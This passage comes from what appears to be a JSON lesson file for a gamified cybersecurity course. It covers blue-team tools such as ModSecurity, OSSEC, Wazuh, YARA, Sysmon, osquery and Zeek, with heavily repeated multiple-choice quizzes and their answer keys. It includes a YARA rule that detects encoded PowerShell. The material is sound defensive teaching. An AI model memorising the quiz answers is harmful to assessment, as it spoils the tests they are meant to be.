keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"df-waf2","cat":"Defense & Blue Team","title":"WAF Deployment","diff":2,"xp":150,"intro":"Deploy web application firewalls.","sections":[{"type":"text","content":"Deploy web application firewalls."},{"type":"code","lang":"bash","content":"# ModSecurity + OWASP CRS\napt install libapache2-mod-security2\n# Enable and configure OWASP Core Rule Set"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"A WAF operates at...","opts":["Layer 3","Layer 7 (Application)","Layer 2","Layer 4"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-ossec","cat":"Defense & Blue Team","title":"OSSEC Host IDS","diff":2,"xp":150,"intro":"Host-based intrusion detection system.","sections":[{"type":"text","content":"Host-based intrusion detection system."},{"type":"code","lang":"bash","content":"# OSSEC monitors: file integrity, logs, rootkits, processes\nossec-control start\n/var/ossec/bin/agent_control -l"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"OSSEC monitors...","opts":["Network traffic only","File integrity, logs, rootkits, and processes","Only Windows","Only Linux"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-wazuh","cat":"Defense & Blue Team","title":"Wazuh SIEM/XDR","diff":2,"xp":150,"intro":"Open-source security monitoring platform.","sections":[{"type":"text","content":"Open-source security monitoring platform."},{"type":"code","lang":"bash","content":"# Wazuh combines: OSSEC + ELK + vulnerability detection\n# Deploys agents to endpoints\n# Central manager correlates events"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Wazuh extends OSSEC with...","opts":["Nothing","ELK integration and vulnerability detection","Only alerting","Only logging"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-yara2","cat":"Defense & Blue Team","title":"YARA Rule Writing for Defense","diff":3,"xp":200,"intro":"Create YARA rules for malware detection.","sections":[{"type":"text","content":"Create YARA rules for malware detection."},{"type":"code","lang":"bash","content":"rule SuspiciousScript {\n  strings: $a = 'powershell -enc' nocase\n  condition: $a and filesize < 10KB\n}\nyara rules.yar suspicious_files/"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"YARA matches on...","opts":["Network traffic","String patterns and conditions in files","Registry keys","Process names"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-sysmon","cat":"Defense & Blue Team","title":"Sysmon Configuration","diff":2,"xp":150,"intro":"Enhanced Windows event logging for security.","sections":[{"type":"text","content":"Enhanced Windows event logging for security."},{"type":"code","lang":"bash","content":"# Sysmon logs: process creation, network connections, file changes\nSysmon64.exe -accepteula -i sysmon-config.xml\n# Key events: 1=ProcessCreate, 3=NetworkConnect, 11=FileCreate"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Sysmon enhances Windows logging by adding...","opts":["Faster boot","Process creation, network, and file events","Disk encryption","User management"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-osquery","cat":"Defense & Blue Team","title":"osquery Endpoint Monitoring","diff":2,"xp":150,"intro":"Query endpoints like a database.","sections":[{"type":"text","content":"Query endpoints like a database."},{"type":"code","lang":"bash","content":"# Query running processes\nosqueryi 'SELECT name,pid,path FROM processes WHERE name=\"suspicious\"'\n# Query listening ports\nosqueryi 'SELECT * FROM listening_ports WHERE port < 1024'\n# Query installed packages\nosqueryi 'SELECT name,version FROM deb_packages'"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"osquery queries endpoints using...","opts":["Custom scripts","SQL-like queries","Python","REST API"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-zeek2","cat":"Defense & Blue Team","title":"Zeek Network Analysis","diff":2,"xp":150,"intro":"Protocol-level network monitoring.","sections":[{"type":"text","content":"Protocol-level network monitoring."},{"type":"code","lang":"bash","content":"zeek -i eth0\n# Generates: conn.log dns.log http.log ssl.log files.log\ncat conn.log | zeek-cut id.orig_h id.resp_h id.resp_p duration"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Zeek provides...","opts":["Firewall rules","Detailed protocol-level network logs","Antivirus","Encryption"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-nids-vs-hids","cat":"Defense & Blue Team","title":"NIDS vs HIDS","diff":1,"xp":75,"intro":"Network vs host-based intrusion detection.","sections":[{"type":"text","content":"Network vs host-based intrusion detection."},{"type":"code","lang":"bash","content":"# NIDS: monitors network traffic (Snort, Suricata, Zeek)\n# HIDS: monitors host activity (OSSEC, Wazuh, Sysmon)\n# Best practice: deploy both for defense in depth"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"NIDS monitors...","opts":["Host files","Network traffic","User accounts","Databases"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a 